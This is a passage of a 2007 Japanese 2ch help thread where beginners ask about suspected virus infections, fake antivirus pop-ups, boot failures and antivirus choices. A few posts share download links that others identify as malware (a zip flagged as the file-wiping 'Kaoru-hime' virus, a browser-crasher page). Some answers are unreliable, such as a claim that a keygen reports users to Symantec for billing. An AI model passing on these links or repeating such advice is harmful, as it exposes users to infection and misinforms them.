764まちがって名前消しちゃいました。:2007/10/09(火) 20:29:21 ID:e/uqi9G7
電源が入っている状態で起動しない場合はウイルスなのでしょうか?
765まちがって名前消しちゃいました。:2007/10/09(火) 21:15:07 ID:???
>>762はとりあえずオンラインスキャン
直らなかったら再インスト

>>764はどこまで起動するのか書いてくれないとわからない
windowsが起動しないの?
BIOSが起動しないの?
766まちがって名前消しちゃいました。:2007/10/09(火) 21:31:27 ID:e/uqi9G7
windowsが起動しません。黒い画面のまま
767まちがって名前消しちゃいました。:2007/10/09(火) 21:36:13 ID:???
とりあえずBIOSで起動ドライブ確認してみて
768まちがって名前消しちゃいました。:2007/10/09(火) 21:41:18 ID:e/uqi9G7
BIOSって何ですか?ホント初心者で申し訳ないっす。
769まちがって名前消しちゃいました。:2007/10/09(火) 21:42:58 ID:???
BIOSは2ちゃんねるで文字で解説してもらうより検索したほうがわかりやすいよ
770まちがって名前消しちゃいました。:2007/10/09(火) 21:46:20 ID:???
後はそのPCの構成と何年ぐらい使ってるかで…
どうしてもわからないなら必要な情報だけバックアップとって再インスト
771まちがって名前消しちゃいました。:2007/10/09(火) 21:49:42 ID:???
>>768
無理して解説してみる。
起動して一番最初に出てくるのはIDEのデバイス確認。
DETECTING IDEなんとかって出てきて、ハードディスクが認識されてればメーカー名や型番が表示される。
NONEになってたらハードディスクが認識されてない。
そのすぐあとにPress XX key Enter BIOS SetUpとかメッセージが出てくる。
そこで指定されたキーを押すとBIOS設定画面になる。
起動ドライブの項目はBOOT DRIVEとかなんとか。
普通はFD、HDD、CDの順になってる。
BIOS設定画面は英語だけど使い方が表示されてる。

こんな感じ。
772まちがって名前消しちゃいました。:2007/10/09(火) 22:08:45 ID:e/uqi9G7
なぜか分かりませんが治りました。
ありがとうございました(^^)
773まちがって名前消しちゃいました。:2007/10/09(火) 22:11:11 ID:AsRJ0Ziz
それはすごい
774まちがって名前消しちゃいました。:2007/10/09(火) 22:37:59 ID:O0G9GCZ4
ワクチンソフトのお勧めとかありますか?
775まちがって名前消しちゃいました。:2007/10/09(火) 22:58:32 ID:???
有料
カスペ
マカフィー
など
無料
avast!4HomeEdition日本語版
AVG
キングソフトインターネットセキュリティ2007フリー
など
キングソフトは評判悪いけど、いろいろ改善されてるので今は普通にいいソフトだと思います。
あくまでフリーとして

検出率を求めるなら、有料のほうがいいと思いますがフリーより悪いソフトもあるので気をつけてください。
普通の使い方ならフリーでも十分だと思います。
776まちがって名前消しちゃいました。:2007/10/10(水) 23:00:22 ID:W1Jw0iCa
すいません教えてください。
かおる姫踏んでしまいました。
zipファイルでDLして、ウイルスバスターのウイルス表示がでました。
zipは開けないで除去。

スキャン,クリーンアップの実施しました。
検索結果で検出されなかったのですが、大丈夫なのでしょうか?
一応、今、シマンテックで、オンラインスキャンしているのですが。
怖いです。
777まちがって名前消しちゃいました。:2007/10/10(水) 23:04:31 ID:???
キーボードのRがずっと押しっぱなしになるだけど何なんでしょうか?
778まちがって名前消しちゃいました。:2007/10/10(水) 23:22:27 ID:???
>>776
バスターで削除されたなら大丈夫
ウイルスとわかっているなら検疫の削除でバックアップファイルも消せばいい
かおる姫ってこのスレですごい名前出てくるけど他では聞いたことない
どんな使いかたしたら感染するんだ?

>>777
キーボードはずしてまだRが押しっぱなし状態ならウイルスの可能性が高い
キーボードはずして押しっぱ状態じゃなくなったらウイルスの可能性は低い(原因はおそらくキーボード)

キーボードが原因だったら分解→掃除
出来ないなら買いかえる
念のため中古で100円くらいの買ってきてためす
押しっぱ状態が直ったら自分の好きなキーボードを買う
779まちがって名前消しちゃいました。:2007/10/10(水) 23:31:58 ID:???
ノートの場合は?
780まちがって名前消しちゃいました。:2007/10/10(水) 23:37:29 ID:???
キーボードの機能を停止して確認
キーボードが原因ならノートを分解
できないならキーボードの機能を停止して別途キーボードを買う
外出先で邪魔だとしたらスクリーンキーボードを使う
781まちがって名前消しちゃいました。:2007/10/10(水) 23:47:01 ID:???
スパイウェア駆除したら直ったんだけどこんなウイルスあるの?
R押す事以外は被害なさそうだし
782まちがって名前消しちゃいました。:2007/10/10(水) 23:51:48 ID:W1Jw0iCa
>>778
ありがとうございます。
手動で外付けハードのzipを除去したもので不安でした。
783まちがって名前消しちゃいました。:2007/10/10(水) 23:53:00 ID:???
さぁ?
そんなピンポイントな被害のウイルスはあまり聞かないけど
ユーザーに安心させるためにカモフラージュする場合が多いからバックドア作られてると思うけど?
784まちがって名前消しちゃいました。:2007/10/10(水) 23:54:31 ID:???
>>782
手動削除なら確実、安心
785まちがって名前消しちゃいました。:2007/10/11(木) 00:50:02 ID:???
>>783
バックドアか、本当に作られてたら自分の知識じゃ見つけられんな。
まぁそんなに変なもん踏んだ覚えもないし大丈夫だとはおもうが
てかIEはやっぱダメだね
786まちがって名前消しちゃいました。:2007/10/11(木) 01:02:19 ID:???
IEは別にだめじゃないよ
だめと言う人もいるけど…
実行形式ファイルを踏んだなら
トロイ→カモフラージュ
侵入型なら
バックドア→カモフラージュ
カモフラージュはあえて別のウイルスを発見させることでユーザーを安心させる効果がある
とりあえず普通の人はオンラインスキャンか再インストぐらいしか対処法はない
カスペルキーなら脆弱性のスキャンもやってるからバックドアの発見も出来るかも?
何もなかったら安心して使えば良いよ
気になるなら再インスト
787まちがって名前消しちゃいました。:2007/10/11(木) 01:27:11 ID:???
>>786
ありがとう。あんたいい人やね。
788まちがって名前消しちゃいました。:2007/10/11(木) 09:16:38 ID:jb+8WMI+
>>619
かなり重度…
それPC再起動した後に起動できなくなりませんでしたか?
789まちがって名前消しちゃいました。:2007/10/11(木) 09:18:05 ID:???
>>651
俺は落とせたよ。
790まちがって名前消しちゃいました。:2007/10/11(木) 09:24:57 ID:???
http://webtron.org/up/img/243.zip
よろしくお願いします。
791まちがって名前消しちゃいました。:2007/10/11(木) 12:48:27 ID:FOJSPYej
>>790
Nortonで「かおる姫」と出ました。
解凍はしませんでした。
792まちがって名前消しちゃいました。:2007/10/11(木) 23:08:19 ID:xhxcPwJI
お前らがウィルス。
793まちがって名前消しちゃいました。:2007/10/12(金) 00:10:05 ID:???
ウイルスじゃなくてウィルスならいるかもしれない
794まちがって名前消しちゃいました。:2007/10/12(金) 03:18:30 ID:???
すいません教えて下さい。
ウイルスチェイサーのオンラインスキャンでTrojan.PWS.Qqpass.1092と言うトロイが引っかかったので
チェイサーの無料お試し版を入れて削除しました。
心配だったので今度はカスペルスキーのオンラインスキャンを試してみた所
スキャン中にチェイサーからC:\WINDOWS\AVPF285.TMP BackDoor.Ifinstと言うウィルスの警告が出ました。
チェイサーの治療記録を見ますと、
ウィルス名 BackDoor.Ifinst、ファイル名 AVPF285.TMP、状態 治療完了、と出ています。
オンラインスキャンをしてたカスペルスキーからはウイルスは検出されませんでした。

念のためにもう一度カスペルスキーでスキャンをした所
またチェイサーからウイルス警告が出ました。
合計4回ほどカスペルスキーでスキャンしたのですが、毎回チェイサーにウイルスが引っかかってきます。
ファイル名はAVP5243.TMP、AVP3285.TMP、AVPB353.TMPと毎回違うのですが
すべてウイルス名はBackDoor.Ifinstとなっています。
治療完了とチェイサーには出ていますし、カスペルスキーからは毎回ウイルスは検出されません。

マカフィーオンラインスキャンとエフ・セキュアオンラインスキャンも試してみたのですが
マカフィーではウイルスは検出されず、チェイサーも何も反応しませんでした。
エフ・セキュアの方では、オンラインスキャン中に
BackDoor.Ifinst AVPA003.TMPと言うウイルスがチェイサーに引っかかりました。
エフ・セキュア自体ではウイルスは検出されませんでした。

これはチェイサーの誤作動なのでしょうか?
PCについてはほとんど初心者なので、どなたかよろしくお願いします。
795794:2007/10/12(金) 03:25:43 ID:???
書き忘れましたが、ウイルスチェイサーだけでスキャンした場合も
ウイルスは検出されないです。
796まちがって名前消しちゃいました。:2007/10/12(金) 04:23:38 ID:???
貴方のパソコンにセキュリティーソフトは入っていますか?
入っているなら一度アンインストールしてカスペルキーの体験版を入れてみてはいかがでしょうか?
カスペルキーのオンラインスキャンは感染しているかを調べることは出来ますが、駆除機能はついていません。
駆除機能がついていないのは少し不便ですが、検出率が高いので感染しているかどうかを調べるなら一番です。
体験版には駆除機能がついていて、カスペルキーもウイルスが検知された場合、体験版を入れることを進めています。
これは商業的な意味があるのかもしれませんが…
スペックが問題なければ一時的にでも入れてみてはいかがですか?
あと、所詮体験版ですからセキュリティーソフトを持っていないのであればこの機会に購入されてみてはいかがですか?
お金を掛けたくないのであればフリーもいくつかありますし…
もちろん、もう持っているのなら別ですが。
797794:2007/10/12(金) 05:30:29 ID:???
>>796
今現在はウイルスチェイサーの体験版を使用しています。
フル機能を1ヶ月体験出来るそうなので
1ヶ月が過ぎたらこのままチェイサーを購入しようと考えています。

カスペルスキー、マカフィー、エフ・セキュアのオンラインスキャンでは何も検出されず
オンラインスキャン中に、ウイルスチェイサーがウイルスを検出するという状態なので
ウイルスなのか誤作動なのか分からないのです。

この場合もチェイサーをアンインストールした方がいいのでしょうか?
798まちがって名前消しちゃいました。:2007/10/12(金) 09:17:42 ID:???
>>797
100%確実ではありませんが、問題のファイルは、AVPxxxx.TMPなので、これは、カスペルスキーのオンラインスキャン時に作成される一時ファイルのようです。
エフ・セキュアは、カスペルスキーと同じスキャンエンジンを持っているので、同様な結果になります。
一時ファイルはスキャン終了後に削除されるので検出されません。
ウイルスチェイサーの誤検出の可能性が高いです。
もし、ウイルスチェイサーの隔離フォルダのような、問題のファイルを保存しているならば、ウイルスチェイサーのメーカーにファイルを送って確認して貰ってください。
ウイルスチェイサーを削除しなくてもいいと思います。問題のファイルを確認して貰ったほうが確実です。
799まちがって名前消しちゃいました。:2007/10/12(金) 11:10:50 ID:???
大抵のセキュリティーソフトではウイルスが検出された時、誤検出で大事なデータが失われてしまう可能性を考えてバックアップファイルを作成します。
バックアップファイルは削除しましたか?
800794:2007/10/12(金) 12:32:45 ID:???
>>798
>>799
ありがとうございます。
ウイルスチェイサーの誤検出の可能性が高いのですね。
少し安心しました。

問題のファイルですが、ウイルスチェイサーの隔離フォルダがどれなのか分かりません。
バックアップファイルも削除してないと思いますが、どこにバックアップされてるのか分かりません。
どこを調べればいいのでしょうか?

勉強不足で申し訳ないです・・・。
801まちがって名前消しちゃいました。:2007/10/12(金) 14:49:50 ID:???
Windowsシステムフォルダにワームのコピーがされた後、次のディレクトリにランダムなファイル名.tmpの名前でDLLファイルを作成し、検索(Explorer.exe)に感染した後、最初に実行したランダムなファイル.exeの活動は中断させます。


ウイルスじゃね?
802まちがって名前消しちゃいました。:2007/10/12(金) 15:28:06 ID:???
http://www.viruschaser.jp/vi_index/vi_b/BackDoor.Iroffer.1213.html

Virus Chaser - アンチウイルスソフト ウイルスチェイサーのサイトには
「BackDoor.Iroffer.1213」 はあったけど「BackDoor.Ifinst」なんてウイルスなかった・・・

別のサイトにはあったけど・・・
http://www.haurijapan.com/virus/virus03.php?Vcode=BAW3000778&gStart=11&gSrchValue=
803まちがって名前消しちゃいました。:2007/10/13(土) 01:00:57 ID:???
原田ウイルスOOに感染してしまいました。
リカバリをしたいのですが、中古の為ディスクがなく困っています。
ちなみにhpのwinXPです。

ディスクなしでリカバリする手段はあるのでしょうか?
804まちがって名前消しちゃいました。:2007/10/13(土) 01:36:55 ID:???
中古でディスクないってどこで買ったの
どれくらいのスペックで何円で
ディスクないのにOS入ったPC売るのはライセンス的にいけなかったような気がするからその店は…
俺も昔だまされたけど…

ないなら買うしかないよ
手に入れようと思えば出来ないこともないけど誰かに譲ってもらう(ライセンスごと)以外は違法になる
805803:2007/10/13(土) 01:55:06 ID:???
購入したのは知人からです。
引越しの際に譲り受け、ディスクは紛失されていました。

普通にPCショップで購入できるものなのでしょうか?
806まちがって名前消しちゃいました。:2007/10/13(土) 02:04:14 ID:???
知人からならまぁいいのかな
たぶん

普通にショップで買えるよ
PCショップじゃなくてもエイデンとかケーズとか家電量販店でも売ってるよ
家電量販店の場合売ってないところもあるけど…店の大きさによる
店員に尋ねてみればいい
値段はXPなら14000〜16000ぐらいかな
たぶん
DSP版とかで安くなったりするけど
807まちがって名前消しちゃいました。:2007/10/13(土) 08:28:52 ID:cZQO/xN2
40代のバカ晒しあげ

401 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/10/13(土) 07:18:55
直接キミのPC内に書き込みに行くからさ、IPアドレス教えなよ。
808まちがって名前消しちゃいました。:2007/10/13(土) 08:40:54 ID:???
ハッキングでもされたのか?
809まちがって名前消しちゃいました。:2007/10/13(土) 08:58:45 ID:irumdqeS
>>808
そんなスキルのある奴じゃないよ。www
おちょくってやってるだけwww
810まちがって名前消しちゃいました。:2007/10/13(土) 10:40:31 ID:???
2chには、房から上級者まで入り乱れてるからなぁ・・・
実は、おちょくってるつもりで、自分が釣られてるだけだったりしてwww
811805:2007/10/13(土) 22:38:02 ID:???
>>806
亀ですが、ご親切にありがとうございます。
とても参考になりました。
812まちがって名前消しちゃいました。:2007/10/17(水) 09:52:57 ID:???
外付けHDの500Gの使用率450G位だったはずなのに気付いたら50Gになってた・・・
外部から操作されたような痕跡ないからウイルスかと思って全チェックしたけど反応がなかった
ZEROだから検出できなかったんだろうか、それとも新種なのかな?
813まちがって名前消しちゃいました。:2007/10/17(水) 15:20:29 ID:vkmaJqUG
814:2007/10/17(水) 16:45:52 ID:???
Last-Modified: Tue, 08 May 2007 09:51:48 GMT
815まちがって名前消しちゃいました。:2007/10/18(木) 00:03:05 ID:???
今日カペルスキー買ったきて、スキャンしてみたら、Packed.win32.NSAnti.rというウイルスに感染しているとでました・・・。
表示に処理できませんでした。理由:処理の延期とでていたんですが、これは駆除できないのでしょうか?
816まちがって名前消しちゃいました。:2007/10/18(木) 01:29:13 ID:???
カスペはやめとけ
817まちがって名前消しちゃいました。:2007/10/18(木) 04:29:23 ID:EtyaUZGI
※ブラクラ注意

http://imepita.zz.tc/020070817

↑これ踏んだらInternet Explorerでページが表示されなくなってしまったんですけど
直す方法教えてくださいお願いします
818まちがって名前消しちゃいました。:2007/10/18(木) 09:16:10 ID:???
>>815
私もりかばりした後なのにガンガン同じのが検知されてたんですが
駆除出来ないって出たので削除するを選んで削除しました
削除したにもかかわらず同じのがガンガン検知されたので
システム復元ポイントのシステム復元をしないにチェックいれて削除したら
とりあえずは今のとこ大丈夫になりましたよ。
819まちがって名前消しちゃいました。:2007/10/18(木) 18:58:41 ID:???
AVGで無事駆除出来たぽいんですが
マイドキュメントの中に「ko〜」と言うロシア語フォルダか何かが作られるウイルス
詳細解る方居ますか?

NAVとかだとワンクリックで詳細検索出来るんですけど、AVGだと無理ですかね?

悪さが判明しないと、ちょっと怖い
820まちがって名前消しちゃいました。:2007/10/18(木) 19:36:26 ID:???
そのフォルダ名で検索掛ければウイルスかわかるはず
そのフォルダがどのプロセスにアクセスされているかで生成しているものがわかる
821まちがって名前消しちゃいました。:2007/10/18(木) 19:57:37 ID:DzD3kd+x
googleで何かを検索して、そこに行こうとしても「Virtual Way.info」とかいうページが表示されてしまいます。アドレスは行きたかったページのままなんですが。
おかしいなと思い、トレンドフレックスのオンラインスキャンを試してみましたが、セキュリティーホールがあるだけで、特にスパイウェア等は見つかりませんでした。
助けてください。
OSはXPのhomeです。
822まちがって名前消しちゃいました。:2007/10/18(木) 20:10:54 ID:???
インフォメーション
823まちがって名前消しちゃいました。:2007/10/19(金) 11:25:39 ID:???
>>817
なんか凄いの踏んだねwww
824まちがって名前消しちゃいました。:2007/10/19(金) 19:30:41 ID:SZaP/SKj
dialer-567っていうのが
ウィルススキャンで反応したんですが
削除できません
このdialer-567って
ウィルスなんでしょうか?
825まちがって名前消しちゃいました。:2007/10/19(金) 20:11:54 ID:???
Windowsのメモ帳でテキストファイル開いたら
知らぬ間に文字化けしてました。
もしかしてウィルスでしょうか?

例: 文→ф
ってな感じです。
お返事待ってます。
826まちがって名前消しちゃいました。:2007/10/19(金) 22:36:41 ID:???
>>824
ウイルスです。
win32: dialer -567
827まちがって名前消しちゃいました。:2007/10/20(土) 01:45:06 ID:???
ZEROが全然ウイルス検出しないから怖くなってノートン買ってきてスキャンしたら
ウイルスがごろごろ出てきたよ
気付かずにずっと使ってたんだよな((´д`)) オソロシイ
828まちがって名前消しちゃいました。:2007/10/20(土) 03:10:06 ID:???
>>826
どんな被害に合いますか?
回線入れても今のところ変わった様子はありません。
829まちがって名前消しちゃいました。:2007/10/20(土) 03:29:49 ID:???
dialer(ダイヤラー)は基本的に、モデムを使って高額な料金のサービスにダイヤルしたりします。
貴方の回線がダイヤルアップ接続なら要注意!!

この種の詐欺の影響を受けるのは、ダイヤルアップユーザーだけではな
い。一部のDSL・ケーブルモデムユーザーも被害に遭う可能性がある。ブ
ロードバンドサービスをコンピュータにインストールした後でも、(内蔵
または外付けの)56Kbpsモデムがアクティブな電話回線につながったまま
というケースがあるからだ。

 DSL・ケーブルモデムユーザーへのアドバイスとしては、PCの内蔵モデ
ムを電話回線から切り離すか、内蔵モデムでない場合は、外付けモデムを
取り外すことだ。PCでFAXを受信するなどの目的でモデムが必要なら、モ
デムがダイヤルしたときにダイヤル音が聞こえるよう、音量を上げた方が
いい。
830まちがって名前消しちゃいました。:2007/10/20(土) 03:46:08 ID:pmgFu13h
ADSLでSV3という機種のルータを使用しています。
一応怖いので電話回線ぶっこ抜きしときます。
831まちがって名前消しちゃいました。:2007/10/20(土) 06:34:24 ID:leJP8jQh
かおる姫というウイルスを踏んでしまいました。
パソコンに電源をいれてもWindowsが立ち上がりません。
解決法を教えてください。
832まちがって名前消しちゃいました。:2007/10/20(土) 11:56:30 ID:???
セーフモード
833まちがって名前消しちゃいました。:2007/10/20(土) 13:48:03 ID:???
ファイル全消しだから、OS再インストール(リカバリ)。
834まちがって名前消しちゃいました。:2007/10/21(日) 00:37:39 ID:???
さっき0時になったら突然PCから男女のヘンな会話が流れて時報を告げた
なにも常駐させてないし動いてたのはブラウザだけで、それらしいページは開いてなかった
PCの内部時計を戻しても同じ現象は起きなかった、インターネットで時刻情報を拾ってくるんだろうか?
なんか不気味、これってウイルスなん?
835まちがって名前消しちゃいました。:2007/10/21(日) 00:41:35 ID:???
ニコニコの時報じゃね?
836まちがって名前消しちゃいました。:2007/10/21(日) 00:54:36 ID:???
ワロタw
837まちがって名前消しちゃいました。:2007/10/21(日) 01:11:48 ID:???
うわ〜俺超恥ずかしい・・
↓見て古城に大笑いした後だったからバチが当たったのかと思った・・
ttp://www.nicovideo.jp/watch/sm1324137
838まちがって名前消しちゃいました。:2007/10/21(日) 02:06:18 ID:???
ニコニコの時報ウザいな
AM0時とAM2時以外にもなるの?
839まちがって名前消しちゃいました。:2007/10/21(日) 08:01:56 ID:???
セーフモードでも起動しないのって\(^O^)/オワタ??
840まちがって名前消しちゃいました。:2007/10/21(日) 12:50:43 ID:DgLuSHGR
841まちがって名前消しちゃいました。:2007/10/21(日) 12:52:32 ID:DgLuSHGR
842まちがって名前消しちゃいました。:2007/10/21(日) 12:57:24 ID:???
俺もかおる姫にやられたぜ
843まちがって名前消しちゃいました。:2007/10/21(日) 12:59:30 ID:DgLuSHGR
844まちがって名前消しちゃいました。:2007/10/21(日) 13:01:28 ID:???
>>839
オワタw
845まちがって名前消しちゃいました。:2007/10/21(日) 13:05:10 ID:DgLuSHGR
846まちがって名前消しちゃいました。:2007/10/21(日) 13:17:09 ID:???
↑のはウイルス入りな訳?
847まちがって名前消しちゃいました。:2007/10/21(日) 13:24:05 ID:DgLuSHGR
848まちがって名前消しちゃいました。:2007/10/21(日) 13:32:30 ID:DgLuSHGR
849まちがって名前消しちゃいました。:2007/10/21(日) 17:07:59 ID:???
友達にノートン「Symantec Norton Internet Security 2007 日本語版」
をもらってその中にあったKeygen.exeっていう奴が
Anti-Virus Free Editionのスキャンで「脅威が検出されました」ってでました。
バスターじゃ出ないし、誤検出でしょうか
850まちがって名前消しちゃいました。:2007/10/21(日) 17:14:47 ID:???
>>849
P2Pで出回ってる悪質なウィルス
PCとIP情報を送信するウィルス

それだとSymantecに送られてるな
後日請求くるよ
851まちがって名前消しちゃいました。:2007/10/21(日) 17:22:35 ID:???
Keygen.exeってウィルスが入ってるだけのものなの?
852まちがって名前消しちゃいました。:2007/10/21(日) 18:54:20 ID:???
シリアルキーとかが入ってる。
どこの誰がどうゆう経緯で手に入れたかわからないセキュリティーソフトを使おうと思うことがすごい。
853まちがって名前消しちゃいました。:2007/10/22(月) 11:54:01 ID:SVDGQ8GU
なんか知らないうちに、ファイル名の表示色が所々
青く変わってる物が(通常、黒でした)けっこーありました。
不気味なのでなんかわかる方いませんか?
854まちがって名前消しちゃいました。:2007/10/22(月) 15:31:23 ID:???
意味がわからない
855まちがって名前消しちゃいました。:2007/10/22(月) 15:31:53 ID:???
>>853
オワタ
856まちがって名前消しちゃいました。:2007/10/22(月) 16:00:01 ID:???
そんなもん、ファイルが圧縮されてるだけだろ。
プロパティの詳細見とけ。
857まちがって名前消しちゃいました。:2007/10/28(日) 17:58:18 ID:4sRV2XwH
COOKIE_SERVINGSYS
COOKIE_REVSCI
COOKIE_QUESTIONMARKET
COOKIE_OVERTURE
COOKIE_AdRevolver
COOKIE_Hitbox
COOKIE_DoubleClick
COOKIE_Atdmt
COOKIE_AdDynamix
COOKIE_RealMedia

上記のスパイウェアが検出されたんですけど
大丈夫でしょうか?いつ感染したかもわかりません。
怪しいサイト等は一切見てないのですが。
858まちがって名前消しちゃいました。:2007/10/28(日) 18:37:08 ID:OdiwnZMl
(\皿/)______________
 |\|                    \
 |/|wwwwwwwwwwwwwwwwwwww/
/ \
859まちがって名前消しちゃいました。:2007/10/28(日) 18:37:40 ID:OdiwnZMl
(\皿/)______________
 |\|                     \
 |/|wwwwwwwwwwwwwwwwwwww/
/ \
860まちがって名前消しちゃいました。:2007/10/29(月) 02:01:10 ID:aUWwKQU8
質問します。パソコンの音声やメディアプレイヤーの動画に雑音が入ったりスローになったりしてるんですが何なのでしょうか?ノートンで何回かスキャンしても脅威は検出されませんでした。
861まちがって名前消しちゃいました。:2007/10/29(月) 02:26:03 ID:???
スペック不足
光学ドライブのレンズ汚れ
スピーカー
862まちがって名前消しちゃいました。:2007/10/29(月) 11:02:27 ID:???
圧縮ファイルのパスワードが無くて困っています
なんとか展開できないでしょうか
863まちがって名前消しちゃいました。:2007/10/29(月) 11:04:04 ID:???
あれ? すれ違い
864まちがって名前消しちゃいました。:2007/10/29(月) 13:12:08 ID:T9/a5Xo8
すいませんが質問させて下さい。
立ち上げてからアイコンをクリックすると
連打された状態になって
どうにもならないのですが
これは何かのウイルスですか?
865まちがって名前消しちゃいました。:2007/10/29(月) 13:20:33 ID:???
866まちがって名前消しちゃいました。:2007/10/29(月) 18:54:11 ID:???
>>865
P2Pで落としたファイルです、ごめんなさい ウィルスだって知ってます
でも、タイトルがすごっく気になるんです。
無料でなんとかならないでしょうか
867まちがって名前消しちゃいました。:2007/10/29(月) 21:33:53 ID:???
>>866
P2Pヤローは基本的にケチだよな。
たまには金払え!
868まちがって名前消しちゃいました。:2007/10/29(月) 22:01:59 ID:???
>>867は留学生
869まちがって名前消しちゃいました。:2007/10/30(火) 18:24:15 ID:???
圧縮ファイルをwinRARでその場に解凍すると、
突然「仁義なきキンタマ」というファイルが出現。

念のため開けずに削除しましたし、
.exeなどはいっさい踏んでませんが、ちょっとだけ心配。

わざとファイル名をウイルス名にしたイタズラ、流行ってるのかな。
870まちがって名前消しちゃいました。:2007/10/31(水) 03:32:58 ID:???
すいません、質問させて下さい。ウイルスバスター2008を使って検索したところ何件かウイルスが発見されたんですが、ウイルスの対処に隔離とあったんですがこれは安全なんでしょうか?それとも探して直接削除した方がいいのでしょうか?よろしくお願いします。
871まちがって名前消しちゃいました。:2007/10/31(水) 16:31:32 ID:???
隔離というのは、ウイルスを削除したということで、VB2008の隔離フォルダにある(隔離ファイルの管理だったかな?)。
誤検出の為にバックアップ目的で隔離してあるが、要らない場合は、隔離ファイルの管理から削除すればいい。
ちなみに、隔離されたファイルは実行不可能な形式に変換するので誤って実行してしまう心配は無い。
872まちがって名前消しちゃいました。:2007/10/31(水) 18:10:16 ID:???
>>871
回答ありがとうございます。ってことは心配しなくても良さそうですね。ありがとうございました。
873まちがって名前消しちゃいました。:2007/10/31(水) 23:03:02 ID:???
さっき2ch見ていて、確実にスパイウェアだというのを誤ってクリックしてしまい、
ウィルスバスターから背景黒の警告や、スパイウェアです!という警告が出ました。

キャンセルする間もなく、いくつかの窓が勝手に立ち上がり、
○○厨ホイホイ♪(○○の部分は忘れました;)という文字と、
REALIPと書かれている横に自分のPCのIPが5〜6個羅列された画面が出てきました。

怖くなったのですぐにウィスルバスターでスキャンしてみたところ、
頭に「Cookie」がつくスパイウェアだけが検出されました。

Cookieの削除は自己判断でという意見をよく見かけますが
この場合大丈夫なのでしょうか。
それとも他のソフトが何か試してみた方がいいのでしょうか。

よろしくお願いします。
874まちがって名前消しちゃいました。:2007/10/31(水) 23:50:45 ID:???
Cookieは別にいりません。
サイトの閲覧履歴みたいなものです。
サイトに入力したパスワードなどが保存されています。
貴方がフリーメールやオンラインゲームなどを利用していたとしても、パスワードを覚えていれば問題ありません。
むしろCookieを盗むウイルスなどがあるので、定期的に削除したほうが良いくらいです。
極端なことを言ってしまえばパスワードなどは、その時々で入力したほうが安全です。
Cookieの削除は自己判断とか関係ありません。
そのCookieがスパイウェアなら削除したほうが良いです。
とゆうかCookieとレジストリと間違えて覚えてませんか?
レジストリの削除は自己責任ですが、Cookieは自己責任も何もないと思います。
875まちがって名前消しちゃいました。:2007/10/31(水) 23:54:40 ID:GQNu6zBy
教えてください。
ウインアンチウイルスプロ2006
というものが起動する度に出てきます。
これを排除するにはどうすればよろしいですか? お願いします。
876まちがって名前消しちゃいました。:2007/11/01(木) 00:00:06 ID:???
ここまで来ると…もう釣り?
877まちがって名前消しちゃいました。:2007/11/01(木) 00:59:10 ID:zHJ88SLW
トロイの木馬が出てきました。
ウイルスを調べるという所を押すと、削除されましたのような言葉が出てきて、「ウイルススキャンを実行しますか」って出ました。どうすればいいですか?

パソコン初心者でよくわかりません。よろしくお願いします。
878まちがって名前消しちゃいました。:2007/11/01(木) 18:29:41 ID:etSvxZWL
初めまして。最近パソコンが変なんです。
@勝手に電源が切れる。(充電不足じゃない。もって二時間くらい)

Aある特定の動作を勝手に操作される。インターネットのページが勝手に下に
スクロールされるor文字を書き込むとき、ずっとスペースキーを押しているみたいに
勝手に右に流れていく。

B勝手に文字が変換される
C起動時、パソコンからでかい音の警告音みたいのが鳴って、ファイルがどうたらこうたらとか書いてある。

誰か教えてください。ウイルスかな?      
879まちがって名前消しちゃいました。:2007/11/01(木) 18:31:49 ID:etSvxZWL
初めまして。最近パソコンが変なんです。
@勝手に電源が切れる。(充電不足じゃない。もって二時間くらい)

Aある特定の動作を勝手に操作される。インターネットのページが勝手に下に
スクロールされるor文字を書き込むとき、ずっとスペースキーを押しているみたいに
勝手に右に流れていく。

B勝手に文字が変換される
C起動時、パソコンからでかい音の警告音みたいのが鳴って、ファイルがどうたらこうたらとか書いてある。

誰か教えてください。ウイルスかな?      
880まちがって名前消しちゃいました。:2007/11/01(木) 19:17:54 ID:???
>>875
http://blog.lucanian.net/archives/50666828.html
どぞ。ちょっと長いけど対処方法がある。
881まちがって名前消しちゃいました。:2007/11/01(木) 20:18:12 ID:???
882まちがって名前消しちゃいました。:2007/11/01(木) 21:55:54 ID:cew3jNhT
なんか小さな正方形の赤○に×の警告画面?が消しても消しても消えません。消す為のOK以外文字は何も書いてません。ネットも表示出来なくなりました。対策ソフト買って来たんですが、ネット繋げず出来ません。全くの初心者なので困ってます。助けてください。
883まちがって名前消しちゃいました。:2007/11/01(木) 22:01:18 ID:???
>正方形の赤○

馬鹿にするなよw
884まちがって名前消しちゃいました。:2007/11/01(木) 22:09:54 ID:???
>>882
リカバリ
885まちがって名前消しちゃいました。:2007/11/01(木) 22:26:39 ID:cew3jNhT
>>883
いや、ほんと何て説明していいか解らなくてすいません。
886まちがって名前消しちゃいました。:2007/11/01(木) 22:28:37 ID:cew3jNhT
リカバリって何でしょうか?ほんとすいません。
887まちがって名前消しちゃいました。:2007/11/01(木) 22:47:18 ID:???
>>886
何かと聞かれると・・・・ググるか、パソコンがメーカー製ならマニュアルを見る。
まあ、要はOSの入ってるドライブ、またはOSの入ってるHD丸ごと
初期化するってことです。
もちろんデータは消えるので自己責任でお願いします。
888まちがって名前消しちゃいました。:2007/11/01(木) 22:51:49 ID:???
>正方形の赤○

正方形なのに丸いとはこれいかに
889まちがって名前消しちゃいました。:2007/11/02(金) 00:41:36 ID:TuwQ1vAH
>>880
有難うございます。 なんとか、ひつこく現れる
ウインアンチウイルスプロ2006 のロゴをデスクトップから
消すことができました。

さらに、質問したいのですが、コントローラーパネルにあるこのロゴを
消したいのですがC:\WINDOWS\System32\av.cplがなく、消すことができません。
方法を教えてください。 お願いします。 


890まちがって名前消しちゃいました。:2007/11/02(金) 00:48:36 ID:???
コントローラーパネルw
891まちがって名前消しちゃいました。:2007/11/02(金) 00:51:29 ID:???
>>890
器の小ささがにじみ出てるねw
892まちがって名前消しちゃいました。:2007/11/02(金) 01:32:24 ID:???
いや、普通にウケタだけだろ
コントローラーパネルw
893まちがって名前消しちゃいました。:2007/11/02(金) 16:55:09 ID:???
うちのではコントロールセンターだけど
894まちがって名前消しちゃいました。:2007/11/02(金) 17:58:46 ID:???
蔓延する犬糞
895まちがって名前消しちゃいました。:2007/11/03(土) 20:49:16 ID:???
bbs.2ch2.net/test/read.cgi/fusianasan/1126678725/l50

ってあぶないさいとなんですか?
896まちがって名前消しちゃいました。:2007/11/03(土) 22:45:34 ID:???
>>889
Cドライブをファイル検索してみちゃどうかな。av.cplで。
OSによってフォルダの名前とか微妙に違うかも。
